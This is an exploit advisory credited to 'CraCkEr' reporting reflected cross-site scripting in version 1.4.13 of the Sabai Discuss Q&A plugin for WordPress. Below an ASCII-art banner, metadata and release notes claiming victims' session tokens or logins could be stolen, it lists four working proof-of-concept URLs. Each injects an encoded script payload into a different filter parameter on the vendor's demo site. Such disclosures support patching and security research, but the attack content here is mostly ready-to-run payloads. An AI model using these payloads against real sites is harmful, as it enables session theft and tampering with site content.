WordPress Sabai Discuss 1.4.13 Cross Site Scripting

┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                      [ Exploits ]                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                                                                    :│  Website  : sabaidiscuss.com                                                           ││  Vendor   : Sabai Discuss                                                              ││  Software : Sabai Discuss - Q&A forum plugin V1.4.13 for WordPress                     ││  Vuln Type: Reflected XSS                                                              ││  Method   : GET                                                                        ││  Impact   : Manipulate the content of the site                                         ││                                                                                        ││────────────────────────────────────────────────────────────────────────────────────────││                              B4nks-NET irc.b4nks.tk #unix                             ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│  Release Notes:                                                                        ││  ═════════════                                                                         ││  The attacker can send to victim a link containing a malicious URL in an email or      ││  instant message can perform a wide variety of actions, such as stealing the victim's  ││  session token or login credentials                                                    ││                                                                                        │┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets:    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL            CryptoJob (Twitter) twitter.com/CryptozJob     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                    © CraCkEr 2022                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘GET parameter 'field_number[min]' is vulnerable to XSShttps://demo.sabaidiscuss.com/questions?category=77&filter=1&field_number[min]=33lnoiy%22%3e%3cscript%3ealert(1)%3c%2fscript%3epfucnGET parameter 'field_number[max]' is vulnerable to XSShttps://demo.sabaidiscuss.com/questions?category=77&filter=1&field_number[max]=33lnoiy%22%3E%3Cscript%3Ealert(1)%3C%2fscript%3EpfucnGET parameter 'field_range[min]' is vulnerable to XSS https://demo.sabaidiscuss.com/questions?category=77&filter=1&field_range[min]=6dstzy%22%3e%3cscript%3ealert(1)%3c%2fscript%3eyl1zmGET parameter 'field_range[max]' is vulnerable to XSShttps://demo.sabaidiscuss.com/questions?category=77&filter=1&field_range[max]=6dstzy%22%3e%3cscript%3ealert(1)%3c%2fscript%3eyl1zm[-] Done